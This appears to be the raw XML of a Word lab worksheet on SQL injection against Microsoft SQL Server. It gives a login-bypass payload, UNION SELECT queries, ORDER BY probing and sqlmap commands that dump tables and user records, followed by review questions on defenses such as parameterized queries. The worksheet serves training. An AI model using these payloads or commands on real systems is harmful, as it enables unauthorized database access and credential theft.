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14</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>PERFORM AN SQL INJECTION ATTACK AGAINST MSSQL TO EXTRACT DATABASES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execute manual authentication bypass, UNION-based injection, and automated database extraction using sqlmap against a vulnerable Microsoft SQL Server (MSSQL) backend.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SQL Injection occurs when untrusted input is concatenated directly into SQL query strings. Attackers manipulate query syntax to bypass login filters or extract database tables.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Burp Suite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sqlmap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Browser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MSSQL Target Environment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Execute Manual Login Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enter payload in login username parameter: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' OR '1'='1' --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Confirm Injection Point via Error Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Append single quote to parameter and observe MSSQL error responses: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http://&lt;target-ip&gt;/product.aspx?id=1'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Determine Query Column Count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use ORDER BY to identify returned column count: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http://&lt;target-ip&gt;/product.aspx?id=1 ORDER BY 5--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Extract Database Version &amp; Name via UNION Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Inject UNION SELECT query to extract MSSQL properties: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http://&lt;target-ip&gt;/product.aspx?id=1 UNION SELECT NULL,@@version,NULL,NULL,NULL--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http://&lt;target-ip&gt;/product.aspx?id=1 UNION SELECT NULL,DB_NAME(),NULL,NULL,NULL--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Automate Database Extraction using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run sqlmap to dump database names, tables, and credentials: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sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" --dbms=mssql --dbs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sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" -D &lt;database_name&gt; --tables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sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" -D &lt;database_name&gt; -T Users --dump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4610" cy="29698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Bypassed login authentication and full database contents (tables, columns, user records) extracted via sqlmap.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difference between error-based, UNION-based, and blind SQL injection?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Error-based uses database error responses. UNION-based combines output with secondary query. Blind relies on True/False logic or time delays.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are stored procedures/parameterized queries effective against SQLi?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Parameterized queries separate SQL commands from user input, treating input strictly as data parameters.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does the -- do in an MSSQL injection payload?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comments out the remainder of original SQL query string, preventing syntax errors.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is the purpose of the ORDER BY technique before a UNION-based attack?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determines exact number of columns returned by original query, required for matching UNION SELECT statement.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What is the risk of dumping password hashes even if they are hashed?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Hashes can be cracked offline using dictionary attacks without triggering account lockout defenses.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378</Words>
  <Characters>2397</Characters>
  <CharactersWithSpaces>2723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2026-10-06T20:12:06Z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